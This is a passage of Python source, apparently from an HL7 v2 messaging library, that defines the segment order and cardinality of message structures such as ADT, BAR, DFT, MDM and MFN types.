('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('PV1', SEGMENTS['PV1'], (1, 1), 'SEG'),
('PV2', SEGMENTS['PV2'], (0, 1), 'SEG'),
('DB1', SEGMENTS['DB1'], (0, -1), 'SEG'),
('OBX', SEGMENTS['OBX'], (0, -1), 'SEG'),
('DG1', SEGMENTS['DG1'], (0, -1), 'SEG'),)),
'ADT_A12': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('PV1', SEGMENTS['PV1'], (1, 1), 'SEG'),
('PV2', SEGMENTS['PV2'], (0, 1), 'SEG'),
('DB1', SEGMENTS['DB1'], (0, -1), 'SEG'),
('OBX', SEGMENTS['OBX'], (0, -1), 'SEG'),
('DG1', SEGMENTS['DG1'], (0, 1), 'SEG'),)),
'ADT_A15': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, -1), 'SEG'),
('PV1', SEGMENTS['PV1'], (1, 1), 'SEG'),
('PV2', SEGMENTS['PV2'], (0, 1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, -1), 'SEG'),
('DB1', SEGMENTS['DB1'], (0, -1), 'SEG'),
('OBX', SEGMENTS['OBX'], (0, -1), 'SEG'),
('DG1', SEGMENTS['DG1'], (0, -1), 'SEG'),)),
'ADT_A16': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, -1), 'SEG'),
('NK1', SEGMENTS['NK1'], (0, -1), 'SEG'),
('PV1', SEGMENTS['PV1'], (1, 1), 'SEG'),
('PV2', SEGMENTS['PV2'], (0, 1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, -1), 'SEG'),
('DB1', SEGMENTS['DB1'], (0, -1), 'SEG'),
('OBX', SEGMENTS['OBX'], (0, -1), 'SEG'),
('AL1', SEGMENTS['AL1'], (0, -1), 'SEG'),
('DG1', SEGMENTS['DG1'], (0, -1), 'SEG'),
('DRG', SEGMENTS['DRG'], (0, 1), 'SEG'),
('ADT_A16_PROCEDURE', GROUPS['ADT_A16_PROCEDURE'], (0, -1), 'GRP'),
('GT1', SEGMENTS['GT1'], (0, -1), 'SEG'),
('ADT_A16_INSURANCE', GROUPS['ADT_A16_INSURANCE'], (0, -1), 'GRP'),
('ACC', SEGMENTS['ACC'], (0, 1), 'SEG'),)),
'ADT_A17': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('PV1', SEGMENTS['PV1'], (1, 1), 'SEG'),
('PV2', SEGMENTS['PV2'], (0, 1), 'SEG'),
('DB1', SEGMENTS['DB1'], (0, -1), 'SEG'),
('OBX', SEGMENTS['OBX'], (0, -1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('PV1', SEGMENTS['PV1'], (1, 1), 'SEG'),
('PV2', SEGMENTS['PV2'], (0, 1), 'SEG'),
('DB1', SEGMENTS['DB1'], (0, -1), 'SEG'),
('OBX', SEGMENTS['OBX'], (0, -1), 'SEG'),)),
'ADT_A18': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('MRG', SEGMENTS['MRG'], (1, 1), 'SEG'),
('PV1', SEGMENTS['PV1'], (1, 1), 'SEG'),)),
'ADT_A20': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('NPU', SEGMENTS['NPU'], (1, 1), 'SEG'),)),
'ADT_A21': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('PV1', SEGMENTS['PV1'], (1, 1), 'SEG'),
('PV2', SEGMENTS['PV2'], (0, 1), 'SEG'),
('DB1', SEGMENTS['DB1'], (0, -1), 'SEG'),
('OBX', SEGMENTS['OBX'], (0, -1), 'SEG'),)),
'ADT_A24': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('PV1', SEGMENTS['PV1'], (0, 1), 'SEG'),
('DB1', SEGMENTS['DB1'], (0, -1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('PV1', SEGMENTS['PV1'], (0, 1), 'SEG'),
('DB1', SEGMENTS['DB1'], (0, -1), 'SEG'),)),
'ADT_A30': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('MRG', SEGMENTS['MRG'], (1, 1), 'SEG'),)),
'ADT_A37': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('PV1', SEGMENTS['PV1'], (0, 1), 'SEG'),
('DB1', SEGMENTS['DB1'], (0, -1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('PV1', SEGMENTS['PV1'], (0, 1), 'SEG'),
('DB1', SEGMENTS['DB1'], (0, -1), 'SEG'),)),
'ADT_A38': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('PV1', SEGMENTS['PV1'], (1, 1), 'SEG'),
('PV2', SEGMENTS['PV2'], (0, 1), 'SEG'),
('DB1', SEGMENTS['DB1'], (0, -1), 'SEG'),
('OBX', SEGMENTS['OBX'], (0, -1), 'SEG'),
('DG1', SEGMENTS['DG1'], (0, -1), 'SEG'),
('DRG', SEGMENTS['DRG'], (0, 1), 'SEG'),)),
'ADT_A39': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('ADT_A39_PATIENT', GROUPS['ADT_A39_PATIENT'], (1, -1), 'GRP'),)),
'ADT_A43': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('ADT_A43_PATIENT', GROUPS['ADT_A43_PATIENT'], (1, -1), 'GRP'),)),
'ADT_A45': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('ADT_A45_MERGE_INFO', GROUPS['ADT_A45_MERGE_INFO'], (1, -1), 'GRP'),)),
'ADT_A50': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('MRG', SEGMENTS['MRG'], (1, 1), 'SEG'),
('PV1', SEGMENTS['PV1'], (1, 1), 'SEG'),)),
'ADT_A52': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('PV1', SEGMENTS['PV1'], (1, 1), 'SEG'),
('PV2', SEGMENTS['PV2'], (0, 1), 'SEG'),)),
'ADT_A54': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, -1), 'SEG'),
('PV1', SEGMENTS['PV1'], (1, 1), 'SEG'),
('PV2', SEGMENTS['PV2'], (0, 1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, -1), 'SEG'),)),
'ADT_A60': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PV1', SEGMENTS['PV1'], (0, 1), 'SEG'),
('PV2', SEGMENTS['PV2'], (0, 1), 'SEG'),
('IAM', SEGMENTS['IAM'], (0, -1), 'SEG'),)),
'ADT_A61': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('PV1', SEGMENTS['PV1'], (1, 1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, -1), 'SEG'),
('PV2', SEGMENTS['PV2'], (0, 1), 'SEG'),)),
'BAR_P01': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, -1), 'SEG'),
('BAR_P01_VISIT', GROUPS['BAR_P01_VISIT'], (1, -1), 'GRP'),)),
'BAR_P02': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('BAR_P02_PATIENT', GROUPS['BAR_P02_PATIENT'], (1, -1), 'GRP'),)),
'BAR_P05': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, -1), 'SEG'),
('BAR_P05_VISIT', GROUPS['BAR_P05_VISIT'], (1, -1), 'GRP'),)),
'BAR_P06': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('BAR_P06_PATIENT', GROUPS['BAR_P06_PATIENT'], (1, -1), 'GRP'),)),
'BAR_P10': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PV1', SEGMENTS['PV1'], (1, 1), 'SEG'),
('DG1', SEGMENTS['DG1'], (0, -1), 'SEG'),
('GP1', SEGMENTS['GP1'], (1, 1), 'SEG'),
('BAR_P10_PROCEDURE', GROUPS['BAR_P10_PROCEDURE'], (0, -1), 'GRP'),)),
'BAR_P12': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PV1', SEGMENTS['PV1'], (1, 1), 'SEG'),
('DG1', SEGMENTS['DG1'], (0, -1), 'SEG'),
('DRG', SEGMENTS['DRG'], (0, 1), 'SEG'),
('BAR_P12_PROCEDURE', GROUPS['BAR_P12_PROCEDURE'], (0, -1), 'GRP'),)),
'BPS_O29': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('BPS_O29_PATIENT', GROUPS['BPS_O29_PATIENT'], (0, 1), 'GRP'),
('BPS_O29_ORDER', GROUPS['BPS_O29_ORDER'], (1, -1), 'GRP'),)),
'BRP_O30': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('BRP_O30_RESPONSE', GROUPS['BRP_O30_RESPONSE'], (0, 1), 'GRP'),)),
'BRT_O32': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('BRT_O32_RESPONSE', GROUPS['BRT_O32_RESPONSE'], (0, 1), 'GRP'),)),
'BTS_O31': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('BTS_O31_PATIENT', GROUPS['BTS_O31_PATIENT'], (0, 1), 'GRP'),
('BTS_O31_ORDER', GROUPS['BTS_O31_ORDER'], (1, -1), 'GRP'),)),
'CRM_C01': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('CRM_C01_PATIENT', GROUPS['CRM_C01_PATIENT'], (1, -1), 'GRP'),)),
'CSU_C09': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('CSU_C09_PATIENT', GROUPS['CSU_C09_PATIENT'], (1, -1), 'GRP'),)),
'DFT_P03': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, -1), 'SEG'),
('PV1', SEGMENTS['PV1'], (0, 1), 'SEG'),
('PV2', SEGMENTS['PV2'], (0, 1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, -1), 'SEG'),
('DB1', SEGMENTS['DB1'], (0, -1), 'SEG'),
('DFT_P03_COMMON_ORDER', GROUPS['DFT_P03_COMMON_ORDER'], (0, -1), 'GRP'),
('DFT_P03_FINANCIAL', GROUPS['DFT_P03_FINANCIAL'], (1, -1), 'GRP'),
('DG1', SEGMENTS['DG1'], (0, -1), 'SEG'),
('DRG', SEGMENTS['DRG'], (0, 1), 'SEG'),
('GT1', SEGMENTS['GT1'], (0, -1), 'SEG'),
('DFT_P03_INSURANCE', GROUPS['DFT_P03_INSURANCE'], (0, -1), 'GRP'),
('ACC', SEGMENTS['ACC'], (0, 1), 'SEG'),)),
'DFT_P11': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, -1), 'SEG'),
('PV1', SEGMENTS['PV1'], (0, 1), 'SEG'),
('PV2', SEGMENTS['PV2'], (0, 1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, -1), 'SEG'),
('DB1', SEGMENTS['DB1'], (0, -1), 'SEG'),
('DFT_P11_COMMON_ORDER', GROUPS['DFT_P11_COMMON_ORDER'], (0, -1), 'GRP'),
('DG1', SEGMENTS['DG1'], (0, -1), 'SEG'),
('DRG', SEGMENTS['DRG'], (0, 1), 'SEG'),
('GT1', SEGMENTS['GT1'], (0, -1), 'SEG'),
('DFT_P11_INSURANCE', GROUPS['DFT_P11_INSURANCE'], (0, -1), 'GRP'),
('ACC', SEGMENTS['ACC'], (0, 1), 'SEG'),
('DFT_P11_FINANCIAL', GROUPS['DFT_P11_FINANCIAL'], (1, -1), 'GRP'),)),
'DOC_T12': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, 1), 'SEG'),
('QAK', SEGMENTS['QAK'], (0, 1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('DOC_T12_RESULT', GROUPS['DOC_T12_RESULT'], (1, -1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'DSR_Q01': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, 1), 'SEG'),
('QAK', SEGMENTS['QAK'], (0, 1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('QRF', SEGMENTS['QRF'], (0, 1), 'SEG'),
('DSP', SEGMENTS['DSP'], (1, -1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'DSR_Q03': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (0, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, 1), 'SEG'),
('QAK', SEGMENTS['QAK'], (0, 1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('QRF', SEGMENTS['QRF'], (0, 1), 'SEG'),
('DSP', SEGMENTS['DSP'], (1, -1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'EAC_U07': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EQU', SEGMENTS['EQU'], (1, 1), 'SEG'),
('EAC_U07_COMMAND', GROUPS['EAC_U07_COMMAND'], (1, -1), 'GRP'),
('ROL', SEGMENTS['ROL'], (0, 1), 'SEG'),)),
'EAN_U09': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EQU', SEGMENTS['EQU'], (1, 1), 'SEG'),
('EAN_U09_NOTIFICATION', GROUPS['EAN_U09_NOTIFICATION'], (1, -1), 'GRP'),
('ROL', SEGMENTS['ROL'], (0, 1), 'SEG'),)),
'EAR_U08': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EQU', SEGMENTS['EQU'], (1, 1), 'SEG'),
('EAR_U08_COMMAND_RESPONSE', GROUPS['EAR_U08_COMMAND_RESPONSE'], (1, -1), 'GRP'),
('ROL', SEGMENTS['ROL'], (0, 1), 'SEG'),)),
'EDR_R07': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, 1), 'SEG'),
('QAK', SEGMENTS['QAK'], (1, 1), 'SEG'),
('DSP', SEGMENTS['DSP'], (1, -1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'EQQ_Q04': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EQL', SEGMENTS['EQL'], (1, 1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'ERP_R09': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, 1), 'SEG'),
('QAK', SEGMENTS['QAK'], (1, 1), 'SEG'),
('ERQ', SEGMENTS['ERQ'], (1, 1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'ESR_U02': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EQU', SEGMENTS['EQU'], (1, 1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, 1), 'SEG'),)),
'ESU_U01': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EQU', SEGMENTS['EQU'], (1, 1), 'SEG'),
('ISD', SEGMENTS['ISD'], (0, -1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, 1), 'SEG'),)),
'INR_U06': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EQU', SEGMENTS['EQU'], (1, 1), 'SEG'),
('INV', SEGMENTS['INV'], (1, -1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, 1), 'SEG'),)),
'INU_U05': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EQU', SEGMENTS['EQU'], (1, 1), 'SEG'),
('INV', SEGMENTS['INV'], (1, -1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, 1), 'SEG'),)),
'LSU_U12': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EQU', SEGMENTS['EQU'], (1, 1), 'SEG'),
('EQP', SEGMENTS['EQP'], (1, -1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, 1), 'SEG'),)),
'MDM_T01': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PV1', SEGMENTS['PV1'], (1, 1), 'SEG'),
('MDM_T01_COMMON_ORDER', GROUPS['MDM_T01_COMMON_ORDER'], (0, -1), 'GRP'),
('TXA', SEGMENTS['TXA'], (1, 1), 'SEG'),)),
'MDM_T02': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PV1', SEGMENTS['PV1'], (1, 1), 'SEG'),
('MDM_T02_COMMON_ORDER', GROUPS['MDM_T02_COMMON_ORDER'], (0, -1), 'GRP'),
('TXA', SEGMENTS['TXA'], (1, 1), 'SEG'),
('MDM_T02_OBSERVATION', GROUPS['MDM_T02_OBSERVATION'], (1, -1), 'GRP'),)),
'MFK_M01': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('MFI', SEGMENTS['MFI'], (1, 1), 'SEG'),
('MFA', SEGMENTS['MFA'], (0, -1), 'SEG'),)),
'MFN_M01': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MFI', SEGMENTS['MFI'], (1, 1), 'SEG'),
('MFN_M01_MF', GROUPS['MFN_M01_MF'], (1, -1), 'GRP'),)),
'MFN_M02': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MFI', SEGMENTS['MFI'], (1, 1), 'SEG'),
('MFN_M02_MF_STAFF', GROUPS['MFN_M02_MF_STAFF'], (1, -1), 'GRP'),)),
'MFN_M03': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MFI', SEGMENTS['MFI'], (1, 1), 'SEG'),
('MFN_M03_MF_TEST', GROUPS['MFN_M03_MF_TEST'], (1, -1), 'GRP'),)),
'MFN_M04': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MFI', SEGMENTS['MFI'], (1, 1), 'SEG'),
('MFN_M04_MF_CDM', GROUPS['MFN_M04_MF_CDM'], (1, -1), 'GRP'),)),
'MFN_M05': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MFI', SEGMENTS['MFI'], (1, 1), 'SEG'),
('MFN_M05_MF_LOCATION', GROUPS['MFN_M05_MF_LOCATION'], (1, -1), 'GRP'),)),
'MFN_M06': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MFI', SEGMENTS['MFI'], (1, 1), 'SEG'),
('MFN_M06_MF_CLIN_STUDY', GROUPS['MFN_M06_MF_CLIN_STUDY'], (1, -1), 'GRP'),)),
'MFN_M07': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MFI', SEGMENTS['MFI'], (1, 1), 'SEG'),
('MFN_M07_MF_CLIN_STUDY_SCHED', GROUPS['MFN_M07_MF_CLIN_STUDY_SCHED'], (1, -1), 'GRP'),)),
'MFN_M08': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MFI', SEGMENTS['MFI'], (1, 1), 'SEG'),
('MFN_M08_MF_TEST_NUMERIC', GROUPS['MFN_M08_MF_TEST_NUMERIC'], (1, -1), 'GRP'),)),
'MFN_M09': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MFI', SEGMENTS['MFI'], (1, 1), 'SEG'),
